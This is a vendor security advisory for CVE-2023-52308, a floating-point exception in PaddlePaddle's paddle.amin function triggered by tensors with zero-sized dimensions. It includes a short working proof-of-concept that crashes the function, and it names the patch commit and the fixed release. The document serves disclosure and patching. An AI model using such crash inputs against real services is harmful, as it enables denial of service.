CVE-2023-52308
FPE in paddle.amin
when x
has invalid dims. The PoC is as follows:
import paddle
import numpy as np
paddle.amin(
x=paddle.to_tensor(np.random.uniform(-6666666, 100000000, [0, 0, 6, 3]).astype(np.float32)),
axis=-1,
keepdim=True
)
We have patched the issue in commit 19da5c0c4d8c5e4dfef2a92e24141c3f51884dcc. The fix will be included in PaddlePaddle 2.6.0.
Please consult our security guide for more information regarding the security model and how to contact us with issues and questions.
This vulnerability has been reported by Tong Liu of CAS-IIE.